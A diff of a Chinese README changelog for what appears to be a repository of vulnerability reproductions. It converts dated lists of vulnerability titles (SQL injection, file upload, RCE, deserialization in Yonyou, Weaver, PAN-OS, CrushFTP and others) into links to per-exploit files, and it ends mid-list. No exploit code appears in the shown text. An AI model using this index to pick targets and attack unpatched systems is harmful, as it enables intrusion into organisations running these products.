OpenMetadata-SpEL注入(CVE-2024-28848) -- OpenMetadata命令执行漏洞(CVE-2024-28253) -- Ncast高清智能录播系统存在任意文件读取漏洞 -- AJ-Report开源数据大屏存在远程命令执行漏洞 -- 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞 +- [和丰多媒体信息发布系统QH.aspx存在文件上传漏洞](./和丰多媒体信息发布系统/和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md) +- [用友NC-bill存在SQL注入漏洞](./用友OA/用友NC-bill存在SQL注入漏洞.md) +- [用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞](./用友OA/用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞.md) +- [OpenMetadata-SpEL注入(CVE-2024-28848)](./OpenMetadata/OpenMetadata-SpEL注入(CVE-2024-28848).md) +- [OpenMetadata命令执行漏洞(CVE-2024-28253)](./OpenMetadata/OpenMetadata命令执行漏洞(CVE-2024-28253).md) +- [Ncast高清智能录播系统存在任意文件读取漏洞](./Ncast高清智能录播系统/Ncast高清智能录播系统存在任意文件读取漏洞.md) +- [AJ-Report开源数据大屏存在远程命令执行漏洞](./AJ-Report/AJ-Report开源数据大屏存在远程命令执行漏洞.md) +- [大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞](./大华/大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md) ## 2024.04.30 新增漏洞 -- 亿赛通电子文档安全管理系统-jlockseniordao-findbylockname-sql注入漏洞 -- 亿赛通电子文档安全管理系统-MailMessageLogServices反序列漏洞 -- 亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞 -- 蓝网科技临床浏览系统-deleteStudy-SQL注入漏洞复现(CVE-2024-4257) 
-- Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞 -- Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148) -- 广州图书馆集群系统WebBookNew存在SQL注入漏洞 -- Likeshop-formimage任意文件上传 -- X2Modbus网关GetUser接口存在信息泄漏漏洞 -- WordPress-Automatic插件存在SQL注入漏洞(CVE-2024-27956) -- 北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞 -- LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138) -- 北京亚控科技KingPortal开发系统漏洞集合 +- [亿赛通电子文档安全管理系统-jlockseniordao-findbylockname-sql注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统-jlockseniordao-findbylockname-sql注入漏洞.md) +- [亿赛通电子文档安全管理系统-MailMessageLogServices反序列漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统-MailMessageLogServices反序列漏洞.md) +- [亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞.md) +- [蓝网科技临床浏览系统-deleteStudy-SQL注入漏洞复现(CVE-2024-4257)](./蓝网科技临床浏览系统/蓝网科技临床浏览系统-deleteStudy-SQL注入漏洞复现(CVE-2024-4257).md) +- [Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞](./Pkpmbs建设工程质量监督系统/Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞.md) +- [Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148)](./Mingsoft/Mingsoft-MCMS前台查询文章列表接口SQL注入(CNVD-2024-06148).md) +- [广州图书馆集群系统WebBookNew存在SQL注入漏洞](./广州图创图书馆集群管理系统/广州图书馆集群系统WebBookNew存在SQL注入漏洞.md) +- [Likeshop-formimage任意文件上传](./Likeshop/Likeshop-formimage任意文件上传.md) +- [X2Modbus网关GetUser接口存在信息泄漏漏洞](./X2Modbus/X2Modbus网关GetUser接口存在信息泄漏漏洞.md) +- [WordPress-Automatic插件存在SQL注入漏洞(CVE-2024-27956)](./WordPress/WordPress-Automatic插件存在SQL注入漏洞(CVE-2024-27956).md) +- [北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞](./北京中科聚网/北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞.md) +- [LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138)](./LiveGBS/LiveGBS存在逻辑缺陷漏洞(CNVD-2023-72138).md) +- [北京亚控科技KingPortal开发系统漏洞集合](./北京亚控科技/北京亚控科技KingPortal开发系统漏洞集合.md) ## 2024.04.28 新增漏洞 -- 用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞 -- 用友GRP-U8-listSelectDialogServlet存在SQL注入 -- 用友GRP-U8-bx_dj_check.jsp存在SQL注入 -- 用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入 -- 用友GRP-U8-userInfoWeb存在SQL注入 -- 用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入 -- 用友GRP-U8-Proxy存在SQL注入漏洞 -- 用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞 -- 用友GRP-U8-FileUpload任意文件上传 -- 用友GRP-U8-UploadFileData任意文件上传 -- 用友GRP-U8-ufgovbank存在XXE漏洞 -- 
用友GRP-U8-PayReturnForWcp接口存在XXE漏洞 -- 用友GRP-U8日志泄漏漏洞 +- [用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞](./用友OA/用友GRP-U8-slbmbygr.jsp存在SQL注入漏洞.md) +- [用友GRP-U8-listSelectDialogServlet存在SQL注入](./用友OA/用友GRP-U8-listSelectDialogServlet存在SQL注入.md) +- [用友GRP-U8-bx_dj_check.jsp存在SQL注入](./用友OA/用友GRP-U8-bx_dj_check.jsp存在SQL注入.md) +- [用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入](./用友OA/用友GRP-U8-obr_zdybxd_check.jsp存在SQL注入.md) +- [用友GRP-U8-userInfoWeb存在SQL注入](./用友OA/用友GRP-U8-userInfoWeb存在SQL注入.md) +- [用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入](./用友OA/用友GRP-U8-dialog_moreUser_check.jsp前台SQL注入.md) +- [用友GRP-U8-Proxy存在SQL注入漏洞](./用友OA/用友GRP-U8-Proxy存在SQL注入漏洞.md) +- [用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞](./用友OA/用友GRP-U8-sqcxIndex.jsp存在SQL注入漏洞.md) +- [用友GRP-U8-FileUpload任意文件上传](./用友OA/用友GRP-U8-FileUpload任意文件上传.md) +- [用友GRP-U8-UploadFileData任意文件上传](./用友OA/用友GRP-U8-UploadFileData任意文件上传.md) +- [用友GRP-U8-ufgovbank存在XXE漏洞](./用友OA/用友GRP-U8-ufgovbank存在XXE漏洞.md) +- [用友GRP-U8-PayReturnForWcp接口存在XXE漏洞](./用友OA/用友GRP-U8-PayReturnForWcp接口存在XXE漏洞.md) +- [用友GRP-U8日志泄漏漏洞](./用友OA/用友GRP-U8日志泄漏漏洞.md) ## 2024.04.27 新增漏洞 -- 通达OA-WHERE_STR存在前台SQL注入漏洞 -- 用友GRP-U8-obr_zdybxd_check存在sql注入漏洞 -- 用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞 -- 用友畅捷通-TPlus-CheckMutex存在sql注入漏洞 -- 用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞 -- 用友畅捷通CRM-create_site.phpSQL注入漏洞 -- MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175) -- 普元EOS-Platform-eos.jmx存在远程代码执行漏洞 -- 普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691) -- 用友U8-Cloud-TableInputOperServlet存在反序列化漏洞 -- 湖南建研质量监测系统upload.ashx文件上传漏洞 -- 脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞 -- ZenML服务器远程权限提升漏洞(CVE-2024-25723) -- WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698) -- CrushFTP服务器端模板注入(CVE-2024-4040) +- [通达OA-WHERE_STR存在前台SQL注入漏洞](./通达OA/通达OA-WHERE_STR存在前台SQL注入漏洞.md) +- [用友GRP-U8-obr_zdybxd_check存在sql注入漏洞](./用友OA/用友GRP-U8-obr_zdybxd_check存在sql注入漏洞.md) +- [用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞](./用友OA/用友畅捷通TPlus-InitServerInfo存在SQL注入漏洞.md) +- [用友畅捷通-TPlus-CheckMutex存在sql注入漏洞](./用友OA/用友畅捷通-TPlus-CheckMutex存在sql注入漏洞.md) +- 
[用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞](./用友OA/用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞.md) +- [用友畅捷通CRM-create_site.phpSQL注入漏洞](./用友OA/用友畅捷通CRM-create_site.phpSQL注入漏洞.md) +- [MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175)](./MajorDoMo/MajorDoMo-thumb.php未授权RCE漏洞复现(CNVD-2024-02175).md) +- [普元EOS-Platform-eos.jmx存在远程代码执行漏洞](./普元EOS-Platform/普元EOS-Platform-eos.jmx存在远程代码执行漏洞.md) +- [普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691)](./普元EOS-Platform/普元EOS-Platform-jmx.jmx存在远程代码执行漏洞(XVE-2023-24691).md) +- [用友U8-Cloud-TableInputOperServlet存在反序列化漏洞](./用友OA/用友U8-Cloud-TableInputOperServlet存在反序列化漏洞.md) +- [湖南建研质量监测系统upload.ashx文件上传漏洞](./湖南建研检测系统/湖南建研质量监测系统upload.ashx文件上传漏洞.md) +- [脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞](./脸爱云一脸通智慧管理平台/脸爱云一脸通智慧管理平台存在UpLoadPic.ashx文件上传漏洞.md) +- [ZenML服务器远程权限提升漏洞(CVE-2024-25723)](./ZenML/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md) +- [WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698)](./WordPress/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md) +- [CrushFTP服务器端模板注入(CVE-2024-4040)](./CrushFTP/CrushFTP服务器端模板注入(CVE-2024-4040).md) ## 2024.04.23 新增漏洞 -- 网动统一通信平台ActiveUC存在任意文件下载漏洞 -- 锐捷校园网自助服务系统operatorReportorRoamService存在SQL注入漏洞 -- 用友政务财务系统FileDownload存在任意文件读取漏洞 -- F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750) -- 用友移动系统管理uploadApk接口存在任意文件上传 -- 泛微e-office系统UserSelect接口存在未授权访问漏洞 -- WIFISKY-7层流控路由器confirm.php接口处存在RCE漏洞 -- 泛微E-Office-uploadfile.php任意文件上传漏洞 -- 宏景HCM系统infoView处存在sql注入漏洞 -- 卡车卫星定位系统create存在未授权密码重置漏洞 -- 脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞 -- 脸爱云一脸通智慧平台SelOperators信息泄露漏洞 -- 禅道项目管理系统身份认证绕过漏洞 +- [网动统一通信平台ActiveUC存在任意文件下载漏洞](./网动统一通信平台/网动统一通信平台ActiveUC存在任意文件下载漏洞.md) +- [锐捷校园网自助服务系统operatorReportorRoamService存在SQL注入漏洞](./锐捷/锐捷校园网自助服务系统operatorReportorRoamService存在SQL注入漏洞.md) +- [用友政务财务系统FileDownload存在任意文件读取漏洞](./用友OA/用友政务财务系统FileDownload存在任意文件读取漏洞.md) +- [F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750)](./F%20logic%20DataCube3/F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750).md) +- [用友移动系统管理uploadApk接口存在任意文件上传](./用友OA/用友移动系统管理uploadApk接口存在任意文件上传.md) +- 
[泛微e-office系统UserSelect接口存在未授权访问漏洞](./泛微OA/泛微e-office系统UserSelect接口存在未授权访问漏洞.md) +- [WIFISKY-7层流控路由器confirm.php接口处存在RCE漏洞](./路由器/WIFISKY-7层流控路由器confirm.php接口处存在RCE漏洞.md) +- [泛微E-Office-uploadfile.php任意文件上传漏洞](./泛微OA/泛微E-Office-uploadfile.php任意文件上传漏洞.md) +- [宏景HCM系统infoView处存在sql注入漏洞](./宏景OA/宏景HCM系统infoView处存在sql注入漏洞.md) +- [卡车卫星定位系统create存在未授权密码重置漏洞](./卡车卫星定位系统/卡车卫星定位系统create存在未授权密码重置漏洞.md) +- [脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞](./脸爱云一脸通智慧管理平台/脸爱云一脸通智慧管理平台存在downloads.aspx信息泄露漏洞.md) +- [脸爱云一脸通智慧平台SelOperators信息泄露漏洞](./脸爱云一脸通智慧管理平台/脸爱云一脸通智慧平台SelOperators信息泄露漏洞.md) +- [禅道项目管理系统身份认证绕过漏洞](./禅道/禅道项目管理系统身份认证绕过漏洞.md) ## 2024.04.19 新增漏洞 -- 用友U8GRP-fastjson -- 云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞 -- Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852) -- IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103) -- 用友GRP-U8-operOriztion存在SQL注入漏洞 -- 时空智友企业流程化管控系统formservice存在SQL注入漏洞 -- 泛微E-Office-jx2_config存在信息泄露漏洞 -- 泛微E-Mobile-messageType.do存在命令执行漏洞 -- 润乾报表dataSphereServlet任意文件上传 -- 若依后台定时任务存在SSRF漏洞 -- 用友NC-showcontent接口存在sql注入漏洞 +- [用友U8GRP-fastjson](./用友OA/用友U8GRP-fastjson漏洞.md) +- [云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞](./云时空/云时空社会化商业ERP系统validateLoginName接口处存在SQL注入漏洞.md) +- [Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852)](./Linksys/Linksys-RE7000无线扩展器命令执行漏洞(CVE-2024-25852).md) +- [IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103)](./IP%20guard%20WebServer/IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md) +- [用友GRP-U8-operOriztion存在SQL注入漏洞](./用友OA/用友GRP-U8-operOriztion存在SQL注入漏洞.md) +- [时空智友企业流程化管控系统formservice存在SQL注入漏洞](./云时空/时空智友企业流程化管控系统formservice存在SQL注入漏洞.md) +- [泛微E-Office-jx2_config存在信息泄露漏洞](./泛微OA/泛微E-Office-jx2_config存在信息泄露漏洞.md) +- [泛微E-Mobile-messageType.do存在命令执行漏洞](./泛微OA/泛微E-Mobile-messageType.do存在命令执行漏洞.md) +- [润乾报表dataSphereServlet任意文件上传](./润乾报表/润乾报表dataSphereServlet任意文件上传.md) +- [若依后台定时任务存在SSRF漏洞](./RuoYi/若依后台定时任务存在SSRF漏洞.md) +- [用友NC-showcontent接口存在sql注入漏洞](./用友OA/用友NC-showcontent接口存在sql注入漏洞.md) ## 2024.04.16 新增漏洞 -- 网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞 -- 
网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞 -- 网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞 -- 网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞 -- 广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞 -- 用友NC-uploadControl接口存在文件上传漏洞 -- SpringBlade框架dict-biz接口存在sql注入漏洞 -- 通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞 -- Progress-Flowmon命令注入漏洞(CVE-2024-2389) -- kkFileView-v4.3.0-RCE -- draytek路由器addrouting命令执行漏洞 -- 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞 -- 富通天下外贸ERP任意文件上传漏洞 -- 用友NC_grouptemplet文件上传漏洞 -- 用友NC-avatar接口存在文件上传漏洞 -- PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400) +- [网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关add_ikev2.php存在SQL注入漏洞.md) +- [网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞.md) +- [网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关config_Anticrack.php存在SQL注入漏洞.md) +- [网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞](./网康科技/网康科技NS-ASG应用安全网关add_postlogin.php存在SQL注入漏洞.md) +- [广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞](./广州图创图书馆集群管理系统/广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞.md) +- [用友NC-uploadControl接口存在文件上传漏洞](./用友OA/用友NC-uploadControl接口存在文件上传漏洞.md) +- [SpringBlade框架dict-biz接口存在sql注入漏洞](./SpringBlade/SpringBlade框架dict-biz接口存在sql注入漏洞.md) +- [通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞](./通天星/通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞.md) +- [Progress-Flowmon命令注入漏洞(CVE-2024-2389)](./Progress/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md) +- [kkFileView-v4.3.0-RCE](./kkFileView/kkFileView-v4.3.0-RCE.md) +- [draytek路由器addrouting命令执行漏洞](./路由器/draytek路由器addrouting命令执行漏洞.md) +- [飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞](./飞企互联/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md) +- [富通天下外贸ERP任意文件上传漏洞](./富通天下外贸ERP/富通天下外贸ERP任意文件上传漏洞.md) +- [用友NC_grouptemplet文件上传漏洞](./用友OA/用友NC_grouptemplet文件上传漏洞.md) +- [用友NC-avatar接口存在文件上传漏洞](./用友OA/用友NC-avatar接口存在文件上传漏洞.md) +- [PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)](./PAN-OS/PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md) ## 2024.04.12 新增漏洞 -- 新视窗新一代物业管理系统任意文件上传漏洞 -- 
Telesquare路由器RCE(CVE-2024-29269) -- 物业专项维修资金管理系统漏洞 -- 用友NC-ActionServlet存在SQL注入漏洞 -- 潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞 -- OpenMetadata命令执行(CVE-2024-28255) -- 魔方网表mailupdate.jsp接口存在任意文件上传漏洞 -- 奇安信VPN任意用户密码重置 -- 润乾报表平台InputServlet存在任意文件读取漏洞 -- 医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞 +- [新视窗新一代物业管理系统任意文件上传漏洞](./新视窗新一代物业管理系统/新视窗新一代物业管理系统任意文件上传漏洞.md) +- [Telesquare路由器RCE(CVE-2024-29269)](./路由器/Telesquare路由器RCE(CVE-2024-29269).md) +- [物业专项维修资金管理系统漏洞](./物业专项维修资金管理系统/物业专项维修资金管理系统漏洞.md) +- [用友NC-ActionServlet存在SQL注入漏洞](./用友OA/用友NC-ActionServlet存在SQL注入漏洞.md) +- [潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞](./潍微科技/潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md) +- [OpenMetadata命令执行(CVE-2024-28255)](./OpenMetadata/OpenMetadata命令执行(CVE-2024-28255).md) +- [魔方网表mailupdate.jsp接口存在任意文件上传漏洞](./魔方网表/魔方网表mailupdate.jsp接口存在任意文件上传漏洞.md) +- [奇安信VPN任意用户密码重置](./天擎/奇安信VPN任意用户密码重置.md) +- [润乾报表平台InputServlet存在任意文件读取漏洞](./润乾报表/润乾报表平台InputServlet存在任意文件读取漏洞.md) +- [医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞](./医院一站式后勤管理系统/医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞.md) ## 2024.04.10 新增漏洞 -- 泛微E-Mobile-client.do存在命令执行漏洞 -- 致远互联-OA前台fileUpload.do存在绕过文件上传漏洞 -- 宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞 -- 用友NC接口PaWfm存在sql注入漏洞 -- 用友NC接口ConfigResourceServlet存在反序列漏洞 -- 用友NC-runStateServlet接口存在SQL注入漏洞 -- 用友NC-workflowImageServlet接口存在sql注入漏洞 -- 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞 -- 畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞 -- H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598) -- 用友NC_saveImageServlet接口存在文件上传漏洞 -- 泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞 -- 用友crm-swfupload接口存在任意文件上传漏洞 +- [泛微E-Mobile-client.do存在命令执行漏洞](./泛微OA/泛微E-Mobile-client.do存在命令执行漏洞.md) +- [致远互联-OA前台fileUpload.do存在绕过文件上传漏洞](./致远OA/致远互联-OA前台fileUpload.do存在绕过文件上传漏洞.md) +- [宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞](./宏景OA/宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞.md) +- [用友NC接口PaWfm存在sql注入漏洞](./用友OA/用友NC接口PaWfm存在sql注入漏洞.md) +- [用友NC接口ConfigResourceServlet存在反序列漏洞](./用友OA/用友NC接口ConfigResourceServlet存在反序列漏洞.md) +- 
[用友NC-runStateServlet接口存在SQL注入漏洞](./用友OA/用友NC-runStateServlet接口存在SQL注入漏洞.md) +- [用友NC-workflowImageServlet接口存在sql注入漏洞](./用友OA/用友NC-workflowImageServlet接口存在sql注入漏洞.md) +- [畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞](./用友OA/畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md) +- [畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞](./用友OA/畅捷通TPlus-App_Code.ashx存在远程命令执行漏洞.md) +- [H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)](./H3C/H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md) +- [用友NC_saveImageServlet接口存在文件上传漏洞](./用友OA/用友NC_saveImageServlet接口存在文件上传漏洞.md) +- [泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞](./泛微OA/泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞.md) +- [用友crm-swfupload接口存在任意文件上传漏洞](./用友OA/用友crm-swfupload接口存在任意文件上传漏洞.md) ## 2024.04.06 新增漏洞 -- 用友U9-PatchFile.asmx接口存在任意文件上传漏洞 -- 用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞 -- 亿赛通DecryptApplicationService2接口任意文件上传 -- 亿赛通update接口sql注入 -- 用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞 -- 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入 -- 科荣AIO-ReadFile存在任意文件读取漏洞 -- 东方通TongWeb-selectApp.jsp存在任意文件上传 -- WordPress-js-support-ticket存在文件上传漏洞 -- WordPress-thimpress_hotel_booking存在代码执行漏洞 -- 万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞 -- 用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞 -- JeePlus低代码开发平台存在SQL注入漏洞 -- 润乾报表InputServlet接口存在文件上传漏洞 -- D-Link-NAS(CVE-2024-3272&&CVE-2024-3273) +- [用友U9-PatchFile.asmx接口存在任意文件上传漏洞](./用友OA/用友U9-PatchFile.asmx接口存在任意文件上传漏洞.md) +- [用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞](./用友OA/用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞.md) +- [亿赛通DecryptApplicationService2接口任意文件上传](./亿赛通电子文档安全管理系统/亿赛通DecryptApplicationService2接口任意文件上传.md) +- [亿赛通update接口sql注入](./亿赛通电子文档安全管理系统/亿赛通update接口sql注入.md) +- [用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞](./用友OA/用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞.md) +- [浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入](./浙大恩特客户资源管理系统/浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md) +- [科荣AIO-ReadFile存在任意文件读取漏洞](./科荣AIO/科荣AIO-ReadFile存在任意文件读取漏洞.md) +- [东方通TongWeb-selectApp.jsp存在任意文件上传](./东方通/东方通TongWeb-selectApp.jsp存在任意文件上传.md) +- 
[WordPress-js-support-ticket存在文件上传漏洞](./WordPress/WordPress-js-support-ticket存在文件上传漏洞.md) +- [WordPress-thimpress_hotel_booking存在代码执行漏洞](./WordPress/WordPress-thimpress_hotel_booking存在代码执行漏洞.md) +- [万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE-wf_printnum.jsp存在SQL注入漏洞.md) +- [用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞](./用友OA/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md) +- [JeePlus低代码开发平台存在SQL注入漏洞](./JeePlus低代码开发平台/JeePlus低代码开发平台存在SQL注入漏洞.md) +- [润乾报表InputServlet接口存在文件上传漏洞](./润乾报表/润乾报表InputServlet接口存在文件上传漏洞.md) +- [D-Link-NAS(CVE-2024-3272&&CVE-2024-3273)](./D-Link/D-Link-NAS(CVE-2024-3272&&CVE-2024-3273).md) ## 2024.03.29 新增漏洞 -- 泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞 -- 用友NC接口saveXmlToFIleServlet存在文件上传 -- TP-Link-ER7206存在命令注入漏洞 -- JumpServer(CVE-2024-29201)远程代码执行漏洞&(CVE-2024-29202)Jinin2模板注入漏洞 -- 用友U8-Cloud接口FileManageServlet存在反序列漏洞 -- 用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞 -- 泛微e-cology接口getLabelByModule存在sql注入漏洞 -- WordPress_LayerSlider插件SQL注入漏洞(CVE-2024-2879) +- [泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞](./泛微OA/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md) +- [用友NC接口saveXmlToFIleServlet存在文件上传](./用友OA/用友NC接口saveXmlToFIleServlet存在文件上传.md) +- [TP-Link-ER7206存在命令注入漏洞](./路由器/TP-Link-ER7206存在命令注入漏洞.md) +- [JumpServer(CVE-2024-29201)远程代码执行漏洞&(CVE-2024-29202)Jinin2模板注入漏洞](./JumpServer/JumpServer(CVE-2024-29201)远程代码执行漏洞&(CVE-2024-29202)Jinin2模板注入漏洞.md) +- [用友U8-Cloud接口FileManageServlet存在反序列漏洞](./用友OA/用友U8-Cloud接口FileManageServlet存在反序列漏洞.md) +- [用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞](./用友OA/用友U8-Cloud接口ServiceDispatcherServlet存在反序列漏洞.md) +- [泛微e-cology接口getLabelByModule存在sql注入漏洞](./泛微OA/泛微e-cology接口getLabelByModule存在sql注入漏洞.md) +- [WordPress_LayerSlider插件SQL注入漏洞(CVE-2024-2879)](./WordPress/WordPress_LayerSlider插件SQL注入漏洞(CVE-2024-2879).md) ## 2024.03.28 新增漏洞 -- 通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞 -- 用友U8-Cloud接口FileServlet存在任意文件读取漏洞 -- 联达OA-UpLoadFile.aspx存在任意文件上传漏洞 -- 协达OA系统绕过登录认证登陆后台 -- 用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞 -- 
金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞 -- 易宝OA-BasicService.asmx存在任意文件上传漏洞 -- WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954) -- 商混ERP-DictionaryEdit.aspxSQL注入漏洞 +- [通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞](./通天星/通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞.md) +- [用友U8-Cloud接口FileServlet存在任意文件读取漏洞](./用友OA/用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md) +- [联达OA-UpLoadFile.aspx存在任意文件上传漏洞](./联达OA/联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md) +- [协达OA系统绕过登录认证登陆后台](./协达OA/协达OA系统绕过登录认证登陆后台.md) +- [用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞](./用友OA/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md) +- [金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞](./金石工程项目管理系统/金石工程项目管理系统TianBaoJiLu.aspx存在SQL注入漏洞.md) +- [易宝OA-BasicService.asmx存在任意文件上传漏洞](./易宝OA/易宝OA-BasicService.asmx存在任意文件上传漏洞.md) +- [WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)](./WordPress/WordPress%20Automatic%20Plugin任意文件下载漏洞(CVE-2024-27954).md) +- [商混ERP-DictionaryEdit.aspxSQL注入漏洞](./商混ERP/商混ERP-DictionaryEdit.aspxSQL注入漏洞.md) ## 2024.03.27 新增漏洞 -- Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767 -- Fortinet-SSL-VPN-CVE-2024-21762 -- omfyUI follow_symlinks文件读取漏洞 -- Fortra FileCatalyst Workflow远程代码执行漏漏洞(CVE-2024-25153) -- 联达OA uploadLogo.aspx存在任意文件上传 -- 网络验证系统getInfo参数存在SQL注入漏洞 -- 致远OA-ucpcLogin密码重置漏洞 -- Cobbler存在远程命令执行漏洞(CVE-2021-40323) -- 锐捷网络无线AC命令执行 +- 